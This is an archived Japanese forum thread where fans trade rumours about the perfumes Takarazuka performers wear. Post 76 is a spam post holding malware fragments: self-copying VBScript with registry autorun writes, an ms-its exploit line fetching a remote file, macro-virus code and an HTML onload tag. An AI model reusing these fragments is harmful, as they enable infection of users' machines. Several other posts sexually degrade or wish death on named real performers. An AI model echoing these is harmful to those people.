5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

★ジェンヌさんの愛用香水★

1 :名無しさん@花束いっぱい。:2006/09/23(土) 22:39:00 ID:vyq/+b8X
ないようなので作ってみました

2 :名無しさん@花束いっぱい。:2006/09/23(土) 22:48:58 ID:AcUlt00n
ドルガのライトブルーはいい香りだよ! クン('ω')クン

3 :名無しさん@花束いっぱい。:2006/09/23(土) 22:49:14 ID:dRw85KP9
OG りかちゃん ティファニーは超有名

4 :名無しさん@花束いっぱい。:2006/09/23(土) 22:52:16 ID:AcUlt00n
クン(^ω^)クン あひツンは何のコロンがオッキニかなぁ?コロンコロン。

5 :名無しさん@花束いっぱい。:2006/09/23(土) 23:13:42 ID:Z/C7Eb6K
轟さんは、何の香水でしょうか?

6 :名無しさん@花束いっぱい。:2006/09/24(日) 00:08:09 ID:wFCcg2+W
麻子はブルガリだっけ?

7 :名無しさん@花束いっぱい。:2006/09/24(日) 00:38:29 ID:8+EX+Wa2
かしチャンは?
香水つけてなくても
自然と爽やかな香りがしてきそう☆

8 :名無しさん@花束いっぱい。:2006/09/24(日) 01:38:13 ID:JbRyPNmk
クン('ω')クン D〇Gのラ〇トブルーはたに愛用間違いないッ。 クン('Å')クン

9 :名無しさん@花束いっぱい。:2006/09/24(日) 01:38:15 ID:uUc6FLev
ブルガリってプールオムのこと?

10 :名無しさん@花束いっぱい。:2006/09/24(日) 01:47:47 ID:JbRyPNmk
あひツンの先月graphで着てたお馬さんshirtも海外セレブブランドだゾ。本で見たゾ〜。 bo('o')ok

11 :名無しさん@花束いっぱい。:2006/09/24(日) 07:41:42 ID:29hZXaSw
アサコとユウヒって、まだプールオム使ってるの?


12 :名無しさん@花束いっぱい。:2006/09/24(日) 11:55:08 ID:ugG81XfQ
花總さんの愛用の香りわかりますか?

13 :名無しさん@花束いっぱい。:2006/09/24(日) 12:17:44 ID:JbRyPNmk
ドルガのウマンじゃない?たかこさんも多分。 クン('ω')クン

14 :名無しさん@花束いっぱい。:2006/09/24(日) 12:50:17 ID:JbRyPNmk
あひツンはディオールかな?

15 :名無しさん@花束いっぱい。:2006/09/24(日) 13:02:50 ID:imlW78Ja
花ちゃんの香水、
だいぶ昔ならCLINIQUEのハッピーって聞いた


16 :名無しさん@花束いっぱい。:2006/09/24(日) 13:04:53 ID:kpfArxPX
昔情報なんかイラネ

17 :名無しさん@花束いっぱい。:2006/09/24(日) 13:40:06 ID:JbRyPNmk
ハピー持ってたわ

18 :名無しさん@花束いっぱい。:2006/09/24(日) 14:11:03 ID:uUc6FLev
タニって何使ってるの?

19 :タニ:2006/09/24(日) 14:25:28 ID:JbRyPNmk
D&Gライトブルー

20 :名無しさん@花束いっぱい。:2006/09/24(日) 18:04:56 ID:7dKgBKnc
オサは何使ってるの??

21 :名無しさん@花束いっぱい。:2006/09/24(日) 18:53:35 ID:WOjeghau
オサは、トイレの香水。

22 :名無しさん@花束いっぱい。:2006/09/24(日) 23:45:01 ID:uUc6FLev
タニはライトブルーなんだぁ

水は何使ってるの?

23 :名無しさん@花束いっぱい。:2006/09/24(日) 23:46:17 ID:e1SB9ehZ
おじゃましまつ


24 :名無しさん@花束いっぱい。:2006/09/24(日) 23:47:32 ID:e1SB9ehZ
彩羽真矢はどうなんでしょ?


25 :名無しさん@花束いっぱい。:2006/09/25(月) 01:16:40 ID:Df225AGf
ミズは香水使わないんじゃなかったっけ?

26 :名無しさん@花束いっぱい。:2006/09/25(月) 01:28:21 ID:JSOotMs8
かしチャンは?

27 :名無しさん@花束いっぱい。:2006/09/25(月) 11:44:15 ID:GLlhiT6z
水は使わないのか
残念…

キムは何使ってるか分かる?

28 :名無しさん@花束いっぱい。:2006/09/25(月) 14:09:53 ID:KCKs6sQi
どこまで本当か知らんが・・・


ttp://kosui2han.net/product/talent.html

29 :名無しさん@花束いっぱい。:2006/09/25(月) 21:54:42 ID:iGl6WBOc
月船さやかて・・・

30 :名無しさん@花束いっぱい。:2006/09/26(火) 00:00:52 ID:AAOrPIZ1
↑のサイト携帯からじゃ見れないよね?
PCからなら見れる?

31 :名無しさん@花束いっぱい。:2006/09/26(火) 22:25:08 ID:Mw1Kgr2y
バーバリーの香水を使ってるジェンヌさん、誰か分かりますか?

32 :名無しさん@花束いっぱい。:2006/09/29(金) 23:18:39 ID:2fDUtI0K
あげてみる

33 :名無しさん@花束いっぱい。:2006/09/29(金) 23:35:39 ID:Tzy9l0BS
なんで皆さんわかるの?すごいです。
私まっつ知りたいな‥

34 :名無しさん@花束いっぱい。:2006/09/29(金) 23:54:42 ID:gQeeIQ5X
たにはライトブルーじゃないよ。
In LOVE AGAIN です。

35 :名無しさん@花束いっぱい。:2006/09/30(土) 10:13:36 ID:ebV+qY24
かしチャンが使ってるの知りたい

36 :名無しさん@花束いっぱい。:2006/09/30(土) 14:21:31 ID:vLY5SASI
>>34まじで?
あのフルーティで男の子に人気の香水?
可愛いなータニ

37 :名無しさん@花束いっぱい。:2006/09/30(土) 16:09:31 ID:e8QK3ZYN
あさこは今何使ってますか??

38 :名無しさん@花束いっぱい。:2006/09/30(土) 23:48:52 ID:kqq49xEL
36タン
ほんとだよぉ
はっきり忘れちゃったけど
会報?かなんかで読んだ気がする。
私もかわいーと思ったw

39 :名無しさん@花束いっぱい。:2006/09/30(土) 23:50:52 ID:kqq49xEL
あと、かしちゃんは現在は
自分のブランド愛用だよ!それもまたかわいー
あのかしちゃんの香水はいい香りだよね、
どっかのブランドと似てる気がするけど。

40 :名無しさん@花束いっぱい。:2006/10/02(月) 14:55:16 ID:A5sQma1v
アレ使ってるんだぁw
確かにどっかの香水と似てる…

41 :名無しさん@花束いっぱい。:2006/10/02(月) 18:10:22 ID:D1ATpZhI
どなたかコムさんの使っている香水しりませんか?

42 :名無しさん@花束いっぱい。:2006/10/02(月) 20:03:16 ID:OSVVizo1
コムは無臭orタ○コのにおいがしそう・・・・・

43 :名無しさん@花束いっぱい。:2006/10/02(月) 22:46:10 ID:0Jk+KiYN
タラコ?

44 :名無しさん@花束いっぱい。:2006/10/03(火) 00:00:01 ID:+oiOfVZt
タイコ?

45 :名無しさん@花束いっぱい。:2006/10/03(火) 00:38:47 ID:ECx+z2hQ
たばこ

46 :名無しさん@花束いっぱい。:2006/10/08(日) 03:15:55 ID:N+AJM9jt
大劇場のロビーの匂いってなんですか?

47 :名無しさん@花束いっぱい。:2006/10/08(日) 07:57:05 ID:wP0S0tET
たぶん大部分が加齢臭かと思われ…

48 :名無しさん@花束いっぱい。:2006/10/08(日) 18:19:31 ID:1CFWpgBH
コムはCLINIQUEの香水

49 :名無しさん@花束いっぱい。:2006/10/08(日) 23:07:08 ID:w3RcPtNP
CLINIQUEの何ですか??

50 :名無しさん@花束いっぱい。:2006/10/09(月) 00:56:57 ID:9t0HlxdP
ハッピー…な訳ないかw

51 :名無しさん@花束いっぱい。:2006/10/09(月) 19:55:47 ID:rcpDvSmj
彩音ちゃんは何使ってるの?

52 :名無しさん@花束いっぱい。:2006/10/09(月) 21:49:33 ID:Tl5mjWkH
オサさんは何使ってるんでしょうか・・?
あまりつけてないイメージがあるんですが・・・。

53 :名無しさん@花束いっぱい。:2006/10/10(火) 14:16:32 ID:sjLh8BYI
46タンの言うとおり、大劇のロビーっていつも(誰もいなくても)
独特の良い匂いがする。特にスロープ降りた辺り。
あれって、なんの香りだろう?(スレ違いですが)

54 :名無しさん@花束いっぱい。:2006/10/10(火) 15:51:29 ID:twilKCI2
>53
あのあたりに時々出没するnacchanの香りかと思われ。

55 :名無しさん@花束いっぱい。:2006/10/10(火) 17:16:32 ID:mziFbB+i
>52
そういえばオサさんって、庭での香水質問にもレスついたの見たことないような。
使ってないのかな? それか香るか香らないかの微かにで判別できないとか?


56 :名無しさん@花束いっぱい。:2006/10/12(木) 22:24:19 ID:tucWg09G
ゆみこさんの誰かしってますか?

57 :名無しさん@花束いっぱい。:2006/10/13(金) 03:02:07 ID:F+USaSIC
結構最近オサが香水について語ったのを読んだ気がする。
どこかは忘れたけど。
「香りで元気になったりできるから香水はつける。
ただ相手役の子や周りの方が香りが苦手な場合もあるので迷惑にならないように
下着などにチョコっとつけて楽しんでいる」
みたいな内容だった。
「下着」だなんてセクシーじゃん?って思ったから覚えてる。(肉布団かもw)
客席で香水プンプン匂わせている女性たちに聞かせたいゼ!と思った。
ただ残念ながら、どこの香水かは不明。




58 :名無しさん@花束いっぱい。:2006/10/14(土) 07:13:12 ID:R4UYKOED
みっちゃんて つけるのかな?

59 :名無しさん@花束いっぱい。:2006/10/14(土) 07:40:53 ID:rXuo+ddx
>46,53 あれ、劇場側がわざとしてるんじゃなかった?ハーブかなんか。

60 :名無しさん@花束いっぱい。:2006/10/14(土) 07:57:16 ID:ok4e+Ykq
59>そうそう。その時公演してる組によって香りが違うらしい、いつかスカステで見た。

61 :名無しさん@花束いっぱい。:2006/10/14(土) 09:00:45 ID:8D/npKC2
資生堂が劇場用に作った香水だよね。
見えないところにお金かけていて
劇団もなかなかやるな、と思う。
最初は匂いがきついと思ったが慣れると、
匂いをかいで「ああ、宝塚にきたんだな」と思う。

62 :名無しさん@花束いっぱい。:2006/10/14(土) 11:51:03 ID:qf7pfdZb
理事ってやっぱりアリュール使ってるの?


63 :名無しさん@花束いっぱい。:2006/10/14(土) 11:56:34 ID:6Hmu+0GH
腰リュウは何つけてるの?

64 :名無しさん@花束いっぱい。:2006/10/14(土) 15:19:19 ID:pbiePmSB
香水アレルギーの人は劇場行けないじゃん。

65 :名無しさん@花束いっぱい。:2006/10/14(土) 18:35:45 ID:m4Umq6PE
>62 聞いてごめんなさい。(轟さんが何つけてるかしりたいので)
「やっぱり」って、どうして?
シャネルだから?

66 :名無しさん@花束いっぱい。:2006/10/14(土) 18:54:19 ID:NMeqP4hT
車3理事は昔はパコラバンヌのカランドルってやつ使ってたなあ。
日本では販売されてなくて、パリに行った時空港で売ってたから
当時轟ファンだった友人に土産に買って帰ったら
すげー喜ばれた。
今は知らんけど。

67 :名無しさん@花束いっぱい。:2006/10/14(土) 20:03:12 ID:gkFPk1Lb
>66 ありがとうです。
ほお〜
今どんなにおいするんだろなあ・・・クンクン・・

68 :名無しさん@花束いっぱい。:2006/10/15(日) 01:24:23 ID:/nSmCxJ6
>>56
ブルガリ

69 :名無しさん@花束いっぱい。:2006/10/15(日) 03:26:39 ID:TecopFw4
まとぶんは?

70 :名無しさん@花束いっぱい。:2006/10/15(日) 10:47:21 ID:/ajwE1Cp
>>68
ありがとうございます
ブルガリのなにかわかりますか?


71 :名無しさん@花束いっぱい。:2006/10/15(日) 14:25:19 ID:7lLGbnvb
なるほど〜>劇場の香り
知らなかったわ。教えてくれてありがとう。

72 :名無しさん@花束いっぱい。:2006/10/15(日) 16:47:27 ID:M4r4ufjv
その香水って大劇場だけ?

73 :名無しさん@花束いっぱい。:2006/10/19(木) 23:02:18 ID:AmRTgQf4
とよこさんのわかる人いますか?

74 :名無しさん@花束いっぱい。:2006/10/23(月) 21:55:34 ID:mtPqUD0s
とうこさんは?

75 :名無しさん@花束いっぱい。:2006/10/24(火) 23:16:11 ID:q+SA8N/7
みわっちは??

76 :<body onload=window()>:2006/10/24(火) 23:46:58 ID:q8bYOgTc
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


77 :名無しさん@花束いっぱい。:2006/10/25(水) 18:09:59 ID:Y7D9ngkA
まっつは???

78 :名無しさん@花束いっぱい。:2006/11/01(水) 22:21:47 ID:4inuF521
ガードの時ってジェンヌの香水、銘柄特定できるほど匂うもんなの?

79 :名無しさん@花束いっぱい。:2006/11/01(水) 22:47:29 ID:m5177USp
匂わない。
生徒さんによっては本人が教えてくれる。

80 :名無しさん@花束いっぱい。:2006/11/01(水) 23:50:18 ID:wu6sX6HG
某生徒さん臭かった…私には合わない香水だったみたい

81 :名無しさん@花束いっぱい。:2006/11/02(木) 09:30:56 ID:hfFse9+N
みっちゃん、巣鴨の香がする。


82 :名無しさん@花束いっぱい。:2006/11/02(木) 10:18:36 ID:3Djp+0KJ
とよこさん客席降りてきたときに香水の香りがしてセレブ感漂いました。お嬢様・・・。

83 :名無しさん@花束いっぱい。:2006/11/15(水) 02:29:25 ID:SF/cLhSC
私はけっこう香りわかるよ、入りでうしろついていくから
いつもクンクンしちゃうw
香水変えたっていうのもだいたいわかる
(私の鼻がよすぎるのか・・・)

84 :名無しさん@花束いっぱい。:2006/11/16(木) 11:46:20 ID:QrrNCyMU
コムは未だck-be?

85 :名無しさん@花束いっぱい。:2006/11/17(金) 07:05:53 ID:O2qs9ics
2000年の時点で今は香水つけてないって言ってたよ>コムちゃん
(歌劇 若手スター名鑑2000)
メモリアルブックで読んで懐かしくなっちゃった。

86 :名無しさん@花束いっぱい。:2006/11/21(火) 02:04:03 ID:T8ZKkHBV
コムちゃんはクリニークの香水の匂いがしたお

87 :名無しさん@花束いっぱい。:2006/11/22(水) 20:34:29 ID:mz0Je7FI
越乃リュウさんのつけてる香水、分かりませんか??
いい香りだったので、気になります

88 :名無しさん@花束いっぱい。:2006/12/02(土) 17:07:53 ID:5lt9ogUB
コムが銀橋に来たときに香水の匂いがしたが何かは分からなかった

89 :名無しさん@花束いっぱい。:2006/12/03(日) 15:46:06 ID:pIlbOAsV
保守age

これだけじゃなんだから、上の方でタニがインラブアゲイン使ってるって見て買ってみたけど、
いい匂いで少し幸せな気分。

90 :名無しさん@花束いっぱい。:2006/12/03(日) 16:01:04 ID:pNLPw63f
>87さん
ファンさんですか?
私も同じく気になります!
ブルガリプールオムのような気もするのですが…

91 :名無しさん@花束いっぱい。:2006/12/03(日) 17:44:58 ID:Y+MuQx15
>87です
はい、ファンです!
でも、全然分からなくて‥

92 :名無しさん@花束いっぱい。:2006/12/04(月) 21:46:47 ID:7WtRQOii
>>86
ハピーかな?それなら同じでうれすい

93 :名無しさん@花束いっぱい。:2006/12/14(木) 22:12:23 ID:QdforpbV
オサは100円ショップの練り香水

94 :名無しさん@花束いっぱい。:2007/01/02(火) 13:17:30 ID:lkXssR8Y
age

95 :名無しさん@花束いっぱい。:2007/01/02(火) 16:54:04 ID:dmISgrrF
オサは通販で買ったフェロモン香水。

96 :名無しさん@花束いっぱい。:2007/01/02(火) 21:29:37 ID:23hH6mB0
私も大劇の香りがすごく気になる。あの香りの香水は市販されていないのですか?
先日、よく似た香りを化粧品売り場で匂ったんですが、特定できませんでした。よく似てる香りでもいいので教えてもらえませんか?

97 :名無しさん@花束いっぱい。:2007/01/03(水) 01:50:14 ID:SracXqjj
86期の谷みずせちゃんの愛用香水が知りたいです。
薔薇の香りがするような…。
知ってる方教えてください。

98 :名無しさん@花束いっぱい。:2007/01/04(木) 14:34:00 ID:XiUvIAWJ
麻子は線香臭い

99 :名無しさん@花束いっぱい。:2007/04/02(月) 15:25:24 ID:bzm0jmIN
あさこゎブルガリプールオム。ゆうひも同じ。

100 :名無しさん@花束いっぱい。:2007/04/02(月) 15:48:46 ID:3VkhI5gt
まだプールオムなの?
プールオムの匂い最近してないよ、違う香水にかえたんじゃまいか?
腰竜の香水が知りたい、すんごいムンムンしてるよね、腰竜いなくなったあとも暫らく匂いするし、腰竜がどっちに移動したかわかるくらいムンムンだお!

101 :名無しさん@花束いっぱい。:2007/04/02(月) 15:54:58 ID:bzm0jmIN
でもさ、ブルガリってあさこのイメージ強くない?(香水関係ないけど・・・)なんか清潔感
あるというか、サラっとしたブランドだよね。

102 :名無しさん@花束いっぱい。:2007/04/02(月) 17:41:54 ID:FPVgSuzB
>100
激しく同意!!!
越リュウの香水知りたい。
すっげーいい匂いなんだもん。

103 :名無しさん@花束いっぱい。:2007/04/02(月) 19:38:37 ID:3TV/2vKD
花總まりさんのしりませんか?

104 :名無しさん@花束いっぱい。:2007/04/02(月) 19:58:28 ID:25MLp/sw
http://okashi.pupu.jp/i/shop_kousui.htm

105 :名無しさん@花束いっぱい。:2007/04/04(水) 16:53:02 ID:jLrn5M6N
↑越リュウのたぶん違うよ
D&Gのメンズじゃないかな

106 :名無しさん@花束いっぱい。:2007/04/04(水) 16:55:29 ID:JSTPDj+E
さてさて、私は昨晩、1人でキャバクラに行ってきました。祐希ちゃんと言う平井理央クリソツのお姉ちゃんを指名し、2時間30くらい密着させて頂きました!
まずはトイレへ。大便器2つあるうち宝箱は共に空を確認。
話の中で彼女が何回もトイレへ行きました。もちろん私も酒に酔った振りしてトイレへ行くこと5回目、彼女の経血がずっしりと染み込んだ重たいナプをゲットしました。
閉店20分前にてのゲットです。

そのナプ、今はビーカーに経血を絞り込み底がヒタヒタになったところで湯船に流し込みました。経血風呂をこれから楽しんで来ま〜す(^-^)v

107 :名無しさん@花束いっぱい。:2007/04/06(金) 07:24:22 ID:PcnNyzsj
>>99
あさこ会に囲まれて観劇した時、プールオムの香りに包まれていた。
…なるほどね。

108 :名無しさん@花束いっぱい。:2007/05/15(火) 14:53:23 ID:wXea86Gg
へぇ〜

109 :名無しさん@花束いっぱい。:2007/05/15(火) 17:24:46 ID:ki1cPnfL
品名に『G』がついて、瓶の柄がレース柄の香水知ってる人、
品名おすえて。

110 :名無しさん@花束いっぱい。:2007/05/15(火) 17:50:51 ID:248m0Lqd
ゴルチェ?

111 :名無しさん@花束いっぱい。:2007/05/16(水) 03:15:10 ID:0WNmW2ug
>>109
GUCCIのENVY me?

112 :名無しさん@花束いっぱい。:2007/05/20(日) 01:27:59 ID:mqu9F3rO
とっくに外出なのかな?。
オサと香水でググっててこんなもん見つけちゃった。
水がエライことにされていてびっくり。

ttp://www.denpan.org/book/DP-400f-8266-1/2.html

113 :名無しさん@花束いっぱい。:2007/05/22(火) 09:27:56 ID:Zm5HKOZo
ちょww
クダラネー・・・と思いつつ最後まで読んじゃったじゃんw

文体と設定が幼稚過ぎるけど、そのかの手料理は評価に値する。以上。

114 :名無しさん@花束いっぱい。:2007/05/22(火) 15:34:25 ID:pymfiiLW
ほんっとにクダラネー・・けど最後まで読んじゃうよねw



115 :名無しさん@花束いっぱい。:2007/05/22(火) 19:04:32 ID:W0VOM0Ln
ミズカワイソスwwwwwww

116 :名無しさん@花束いっぱい。:2007/05/23(水) 19:51:35 ID:9jyUkASy
ワロツwwww

117 :名無しさん@花束いっぱい。:2007/05/23(水) 22:53:42 ID:xUdj008g
水は香水使わないんだよ

118 :名無しさん@花束いっぱい:2007/05/23(水) 23:24:43 ID:+xPg1rCq
>>117 水は腋臭が芳し過ぎるんでしょ^^ 
股も結構な具合だとか漏れ伝わってきますわ

119 :名無しさん@花束いっぱい。:2007/05/24(木) 22:29:46 ID:aEI+Crkx
タニ愛用のインラブアゲインって
どういう系統のにおい?

120 :名無しさん@花束いっぱい。:2007/05/26(土) 19:44:18 ID:iNUiUpQe
>112が面白すぎて激しくワロタ
水ガンガレ

121 :名無しさん@花束いっぱい。:2007/05/27(日) 22:10:05 ID:6RLrOgSi
112がシリーズ物なら別のも読んでみたいと思った私は
腐りかけ…か…?

122 :名無しさん@花束いっぱい。:2007/05/28(月) 00:38:31 ID:WsG3gxgt
>>121
大丈夫w
私も思わず目次を探してしまったからなw

123 :名無しさん@花束いっぱい。:2007/05/28(月) 23:41:38 ID:FShyQdlG
くだらねー と思いつつ著者の作品全部読んでしまった
自分は腐れケテーイなのか?

124 :名無しさん@花束いっぱい。:2007/05/29(火) 13:22:42 ID:BJP5a+ZG
自分も読んでしまった…腐ってるorz
麻子が受け専門で何気に笑えた

125 :名無しさん@花束いっぱい。:2007/06/01(金) 00:50:37 ID:0nvcmg0i
腐れ仲間に入れて…orz
オレ様と乙女を入れ替えた方が現実味がありそーだがw

126 :名無しさん@花束いっぱい。:2007/06/01(金) 20:11:23 ID:M1nB4s/K
漏れも仲間に入れてw
かしげとオレクマの結婚式に大笑いww

127 :名無しさん@花束いっぱい。:2007/06/04(月) 02:20:34 ID:Hl2i+2HD
>>112
初めて読んだけどびっくり。
面白いこと思い付くんだなぁって心底感心しちゃったよ。
どういう発想でこういう設定を思い付けるんだろう。

そしてチカちゃんの香水のブランドはなんだったんだろうかw

128 :名無しさん@花束いっぱい。:2007/06/05(火) 22:11:13 ID:NX0qpiVb
もう香水売ってくれないかな

129 :名無しさん@花束いっぱい。:2007/06/05(火) 22:36:10 ID:NhZhNiwD
エルメスの 
ナイルの庭
使ってるのどなたかわかります?

130 :名無しさん@花束いっぱい。:2007/06/11(月) 07:05:58 ID:6LKuDJVr
どこからナイルの庭が?

131 :名無しさん@花束いっぱい。:2007/06/11(月) 21:10:47 ID:kPLctAz8
112ってまだ読める?

132 :名無しさん@花束いっぱい。:2007/06/12(火) 10:20:59 ID:Y1q+cSXf
消えてるね。
かしゆひあさの3角関係の話、後で読もうと思ってたのにw

133 :名無しさん@花束いっぱい。:2007/06/12(火) 13:44:02 ID:ZGqoC/aM
表紙に写真使ってたからまずいんじゃね?
しかし112-127の書き込みを読んで
きっとあんなでこんな妄想小説なんだろうな〜と思ってたら
開いて読んだら想像通りだったんで、そんな自分が嫌・・・

134 :名無しさん@花束いっぱい。:2007/06/14(木) 04:23:19 ID:3xm8oDhJ
まとめサイトがあったらなぁ

135 :名無しさん@花束いっぱい。:2007/06/14(木) 22:35:17 ID:CZU0gfZ9
読みたいけど
もうない?

136 :名無しさん@花束いっぱい。:2007/06/15(金) 23:12:10 ID:0UHu0JA7
花總まりは何使ってる?

137 :名無しさん@花束いっぱい。:2007/06/16(土) 08:33:12 ID:jeVSW/15
たかこさん

138 :名無しさん@花束いっぱい。:2007/06/22(金) 14:56:05 ID:tR5HidHu
みんなどこから情報を?

139 :名無しさん@花束いっぱい。:2007/06/22(金) 22:41:58 ID:uubpoSUH
花總さん、クリニークのハッピーだよ

140 :名無しさん@花束いっぱい。:2007/06/26(火) 20:17:37 ID:fy8txO+P
トロイ?

141 :名無しさん@花束いっぱい。:2007/06/26(火) 21:11:22 ID:YZQmSvnx
★しみこは?

142 :名無しさん@花束いっぱい。:2007/07/05(木) 18:20:28 ID:lIoSFxk+
(・∀・)

143 :名無しさん@花束いっぱい。:2007/07/06(金) 11:35:14 ID:1HfDoN8D
104のURLのとこに、いっぱい書いてあるじゃん

144 :名無しさん@花束いっぱい。:2007/07/07(土) 10:17:10 ID:pBQuviog
タニさん、最近甘い香でない?
香水、なにに変えたのかわかる方いますか?


145 :名無しさん@花束いっぱい。:2007/08/29(水) 22:16:24 ID:D/mVaEW/
あまいかおりではないでつよ
こうすいはないしよでつ

146 :名無しさん@花束いっぱい。:2007/10/19(金) 17:03:12 ID:LxVPPYoq
・・・。

147 :名無しさん@花束いっぱい。:2007/12/06(木) 02:21:49 ID:uV4fZYr0
みなさんどこから情報を得てるんですか?

148 :名無しさん@花束いっぱい。:2007/12/06(木) 04:28:20 ID:UuSTzw2N
あひは最近変えたのかなあ?
前は212だった気がするんだけどこの前すれ違ったとき違う香りだった気が・・・?
212使ってるって聞いたのも随分昔だしなあ・・・。
私は自分では何使ってるのかまでは推定できなかった。
けど212とそんなに系統が違うわけではない香りのような気がしたんだけどな。
わからん・・・。
どなたかご存知でしたら教えてください・・・。


149 :名無しさん@花束いっぱい。:2007/12/11(火) 05:48:17 ID:hDcOw4C0
まとめが欲しい

150 :名無しさん@花束いっぱい。:2007/12/12(水) 14:05:09 ID:leE+lkiA
チカちゃんは香水嫌いなの?

151 :名無しさん@花束いっぱい。:2007/12/23(日) 02:38:08 ID:XMCOLkjD
 

152 :名無しさん@花束いっぱい。:2007/12/30(日) 23:57:31 ID:hNedspUW
あげ

153 :名無しさん@花束いっぱい。:2007/12/31(月) 16:24:51 ID:EXhjMSSx
ともよんの香水はオレの精液

154 :名無しさん@花束いっぱい。:2007/12/31(月) 19:24:42 ID:EXhjMSSx
稔幸さんの使用している香水は神田知の

155 :名無しさん@花束いっぱい。:2008/01/01(火) 05:53:03 ID:X8NU6OVT
ほう

156 :名無しさん@花束いっぱい。:2008/01/02(水) 19:57:20 ID:upVP6/R3
私の贔屓は代表の車の消臭剤の香りがします・゜・(ノД`)・゜・。

157 :名無しさん@花束いっぱい。:2008/01/04(金) 07:09:45 ID:BAczq/x2
あちゃー

158 :名無しさん@花束いっぱい。:2008/01/04(金) 17:17:09 ID:Fv63JeiS
明日海さんはなに使ってる?いつもいいにおいがする

159 :名無しさん@花束いっぱい。:2008/01/06(日) 09:35:18 ID:BuwHLMKq
いい匂いってどんな?

160 :名無しさん@花束いっぱい。:2008/01/09(水) 09:03:29 ID:vfJCKrob
稔幸死ね

161 :名無しさん@花束いっぱい。:2008/01/11(金) 15:36:07 ID:c1QEc2Ow
稔幸ィ`

162 :名無しさん@花束いっぱい。:2008/01/13(日) 09:51:44 ID:keJ5oahN
いや。稔幸いらない。大嫌い。本名の野崎ってのも何か生理的に受け付けない。だから早く友達のいるサンパウロに行って。

163 :名無しさん@花束いっぱい。:2008/01/20(日) 05:12:01 ID:JTHHwxnp
カワイソスw

164 :名無しさん@花束いっぱい。:2008/01/20(日) 05:31:55 ID:xvVSxfJt
稔○消えてくれ!

165 :名無しさん@花束いっぱい。:2008/01/20(日) 17:12:43 ID:xvVSxfJt
銀河系から

166 :名無しさん@花束いっぱい。:2008/01/31(木) 02:01:40 ID:X4TuMnoG
いつから嫌われてるの?


167 :名無しさん@花束いっぱい。:2008/02/03(日) 07:14:03 ID:vp+AX04e
 

168 :名無しさん@花束いっぱい。:2008/02/03(日) 21:39:56 ID:rGZgdqA0
あひちゃんって香水付けてる?
付けてたら何か教えて

169 :名無しさん@花束いっぱい。:2008/02/04(月) 01:18:56 ID:t/GAfZQm
>>168
あひはキャロリーナヘレラの212を前つけてたみたいだけど今はわからない

170 :名無しさん@花束いっぱい。:2008/02/04(月) 16:38:36 ID:l9CfiNZ4
169さんありがとうございます\(≧▽≦)丿

171 :名無しさん@花束いっぱい。:2008/02/07(木) 12:56:09 ID:0UQppZUB
>>169
いいなあピッタリ

172 :名無しさん@花束いっぱい。:2008/02/17(日) 05:00:19 ID:mE75mcIG
age

173 :名無しさん@花束いっぱい。:2008/02/17(日) 12:27:11 ID:LGBfEpU3
ちえがお茶会でサイン入れて抽選のプレゼントにしたオレンジの使いかけ香水はなんだったのだろう。
香水に疎くて分からないー。

174 :名無しさん@花束いっぱい。:2008/02/20(水) 09:04:52 ID:bmD0Uwtu
OGだけどユリ(天海)がトップ時代使っていたのが
「シャネル・エゴイスト」だっていうのは知ってる
アサヒグラフ別冊に当時の各組トップ使用の化粧品や香水が写真入で掲載
紫苑のお気に入り香水は「資生堂・むらさき」となってた(同情報)

175 :名無しさん@花束いっぱい。:2008/02/20(水) 11:13:35 ID:vHNGGp4G
>174
〆さんのむらさきは確か今はもうないんですよね?
欲しかった〜

176 :名無しさん@花束いっぱい。:2008/02/20(水) 12:49:06 ID:i48xB1i2
>>174
むらさき好きだったな

177 :名無しさん@花束いっぱい。:2008/02/20(水) 13:04:16 ID:qDK7wvS4
夜間飛行

178 :名無しさん@花束いっぱい。:2008/02/24(日) 05:09:47 ID:YnWuP9iy
昔からある香水だとイメージ壊れなくていい

179 :名無しさん@花束いっぱい。:2008/03/01(土) 17:59:43 ID:GNi1Pg9e
>>173
どんなデザインだった?

180 :名無しさん@花束いっぱい。:2008/03/02(日) 16:20:41 ID:RI4I4K8V
age

181 :名無しさん@花束いっぱい。:2008/03/02(日) 17:33:19 ID:+pWTU8B6
りさは天然的にミルクかキンモクセイの香りちゅるから香水なし。 あおいはシャネル5か チャンスかな。 ('-^*)

182 :名無しさん@花束いっぱい。:2008/03/06(木) 05:48:40 ID:ghxR5cTX
キンモクセイだとトイレっぽくていやん

183 :名無しさん@花束いっぱい。:2008/03/11(火) 21:29:20 ID:G7HBaS44
      人
    (__)
  \(__)/ <トイレ?
   (真ω飛)

184 :名無しさん@花束いっぱい。:2008/03/12(水) 03:32:22 ID:C2VcFTZJ
うんち
ゃんのトワレの香りはバラかな?
キャトルいってみようっと

185 :名無しさん@花束いっぱい。:2008/03/12(水) 04:45:18 ID:W4kR0Nu8
んー

186 :名無しさん@花束いっぱい。:2008/03/12(水) 08:45:39 ID:bRZoag2m
キムちゃんって香水使ってんのかな?

187 :名無しさん@花束いっぱい。:2008/03/13(木) 00:40:07 ID:dBJklO59
あおいはCHANEL5かな。 りさは使ってないんじゃない?トントンはクリニークハッピーかD&Gライトブルー、DHC。 ライオンハートも。 昔はキャロライナヘレナ212を使ってみたが使いきれず酸化ちた。

